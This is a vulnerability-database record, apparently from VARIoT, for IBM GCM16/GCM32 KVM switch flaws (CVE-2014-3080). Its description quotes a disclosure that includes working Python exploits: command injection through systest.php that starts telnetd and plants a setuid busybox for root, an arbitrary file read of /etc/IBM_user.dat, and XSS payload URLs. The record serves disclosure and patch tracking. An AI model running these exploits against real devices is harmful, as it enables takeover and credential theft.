      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0279",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "global console manager 32",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      },
      {
        "model": "global console manager 16",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      },
      {
        "model": "1754 gcm16 global console manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "1.20.20.23447"
      },
      {
        "model": "1754 gcm32 global console manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "ibm",
        "version": "1.20.20.23447"
      },
      {
        "model": "global console manager 16",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      },
      {
        "model": "global console manager 32",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "1.20.0.22575"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:ibm:global_console_manager_16_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:ibm:global_console_manager_32_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Alejandro Alvarez Bravo",
    "sources": [
      {
        "db": "BID",
        "id": "68777"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2014-3080",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2014-3080",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-71019",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-3080",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-3080",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201407-642",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-71019",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple cross-site scripting (XSS) vulnerabilities on IBM GCM16 and GCM32 Global Console Manager switches with firmware before 1.20.20.23447 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to kvm.cgi or (2) the key parameter to avctalert.php. IBM 1754 GCM16 and GCM32 Global Console Managers are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \nThe following versions are vulnerable:\nIBM 1754 GCM16 Global Console Manager running firmware 1.20.0.22575 and prior\nIBM 1754 GCM32 Global Console Manager running firmware 1.20.0.22575 and prior. IBM 1754 GCM16 and GCM32 Global Console Managers (GCM) are both 1754 series KVM switch products of IBM Corporation in the United States. The product supports AES encryption, LDAP and smart card/common access card (CAC) readers and more, enabling centralized authentication and local or remote system access. The vulnerability stems from insufficient filtering of the \u0027query\u0027 string in the kvm.cgi file and insufficient filtering of the \u0027key\u0027 parameter in the avctalert.php script .  *Product description*\n The IBM 1754 GCM family provides KVM over IP and serial console management\ntechnology in a single appliance. Versions v1.20.0.22575 and prior are\nvulnerables. \n Note that this vulnerability is also present in some DELL and probably\nother vendors of this rebranded KVM. I contacted Dell but no response has\nbeen received. \n\n *1. Remote code execution *\n CVEID: CVE-2014-2085\n Description: Improperly sanitized input may allow a remote authenticated\nattacker to perform remote code execution on the GCM KVM switch. \n PoC of this vulnerability:\n\n#!/usr/bin/python\"\"\"\nExploit for Avocent KVM switch v1.20.0.22575. \nRemote code execution with privilege elevation. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. Default user is \"Admin\" with blank password. \nAfter running exploit, connect using telnet to device with user target\n(pass: target) then do \"/tmp/su -\" to gain root (password \"root\")\nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\nimport os\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\n\ndurl = \"https://\" + target + \"/systest.php?lpres=;%20/usr/\nsbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%\n206755%20/tmp/su%20;\"\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n        print \"[*] Sending GET to \" + target + \" with session id \" + sessid\n+ \"...\"\n        c.perform()\n        c.close()\nexcept:\n        print \"\"\nfinally:\n        print \"[*] Done\"\nprint \"[*] Trying telnet...\"\nprint \"[*] Login as target/target, then do /tmp/su - and enter password\n\\\"root\\\"\"\nos.system(\"telnet \" + target)\n\n*2. Arbitrary file read *\n CVEID: CVE-2014-3081\n Description: This device allows any authenticated user to read arbitrary\nfiles. Files can be anywhere on the target. \n\n PoC of this vulnerability:\n\n#!/usr/bin/python\n\"\"\"\nThis exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to\nread arbitrary files on device. \nSessionId (avctSessionId) is neccesary for this to work, so you need a\nvalid user. \nalex.a.bravo@gmail.com\n\"\"\"\n\nfrom StringIO import StringIO\nimport pycurl\n\nsessid = \"1111111111\"\ntarget = \"192.168.0.10\"\nfile = \"/etc/IBM_user.dat\"\n\ndurl = \"https://\" + target + \"/prodtest.php?engage=video_\nbits\u0026display=results\u0026filename=\" + file\n\nstorage = StringIO()\nc = pycurl.Curl()\nc.setopt(c.URL, durl)\nc.setopt(c.SSL_VERIFYPEER,0)\nc.setopt(c.SSL_VERIFYHOST,0)\nc.setopt(c.WRITEFUNCTION,storage.write)\nc.setopt(c.COOKIE,\u0027avctSessionId=\u0027 + sessid)\n\ntry:\n        c.perform()\n        c.close()\nexcept:\n        print \"\"\n\ncontent = storage.getvalue()\nprint content.replace(\"\u003ctd\u003e\",\"\").replace(\"\u003c/td\u003e\",\"\")\n\n*3. Cross site scripting non-persistent*\n CVEID: CVE-2014-3080\n Description: System is vulnerable to cross-site scripting, caused by\nimproper validation of user-supplied input. \n\n Examples:\nhttp://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\nhttps://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E\n\n*Vendor Response:*\nIBM release 1.20.20.23447 firmware\n\n*Timeline:*\n2014-05-20 - Vendor (PSIRT) notified\n2014-05-21 - Vendor assigns internal ID\n2014-07-16 - Patch Disclosed\n2014-07-17 - Vulnerability disclosed\n\n*External Information:*\nInfo about the vulnerability (spanish):\nhttp://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html\nIBM Security Bulletin:\nhttp://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983\n\n-- \n--\nAlejandro Alvarez Bravo\nalex.a.bravo@gmail.com\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "BID",
        "id": "68777"
      },
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-71019",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-3080",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "68777",
        "trust": 2.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "34132",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "127543",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642",
        "trust": 0.7
      },
      {
        "db": "SECUNIA",
        "id": "60260",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "93929",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-71019",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "db": "BID",
        "id": "68777"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "id": "VAR-201408-0279",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2025-04-13T23:05:08.269000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MIGR-5095983",
        "trust": 0.8,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/68777"
      },
      {
        "trust": 1.7,
        "url": "http://www.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/34132/"
      },
      {
        "trust": 1.1,
        "url": "http://seclists.org/fulldisclosure/2014/jul/113"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/127543/ibm-1754-gcm-kvm-code-execution-file-read-xss.html"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93929"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3080"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3080"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/93929"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/60260"
      },
      {
        "trust": 0.1,
        "url": "http://kvm/kvm.cgi?%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
      },
      {
        "trust": 0.1,
        "url": "https://\""
      },
      {
        "trust": 0.1,
        "url": "http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html"
      },
      {
        "trust": 0.1,
        "url": "https://kvm/avctalert.php?arg1=dadadasdasd\u0026arg2=dasdasdas\u0026key=%3cscript%3ealert%28%22aaa%22%29%3c/script%3e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2085"
      },
      {
        "trust": 0.1,
        "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095983"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3080"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3081"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "db": "BID",
        "id": "68777"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-08-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "date": "2014-07-14T00:00:00",
        "db": "BID",
        "id": "68777"
      },
      {
        "date": "2014-08-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "date": "2014-07-21T19:57:35",
        "db": "PACKETSTORM",
        "id": "127543"
      },
      {
        "date": "2014-07-29T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "date": "2014-08-17T23:55:06.853000",
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-71019"
      },
      {
        "date": "2014-07-14T00:00:00",
        "db": "BID",
        "id": "68777"
      },
      {
        "date": "2014-08-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      },
      {
        "date": "2014-08-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      },
      {
        "date": "2025-04-12T10:46:40.837000",
        "db": "NVD",
        "id": "CVE-2014-3080"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IBM GCM16 and  GCM32 Global Console Manager Cross-site scripting vulnerability in switch firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003831"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201407-642"
      }
    ],
    "trust": 0.6
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2014-3080 (GCVE-0-2014-3080)

GHSA-7QRX-H23W-MQRJ

FKIE_CVE-2014-3080

GSD-2014-3080

VAR-201408-0279

!/usr/bin/python"""

!/usr/bin/python

--

Tags

Sightings

Nomenclature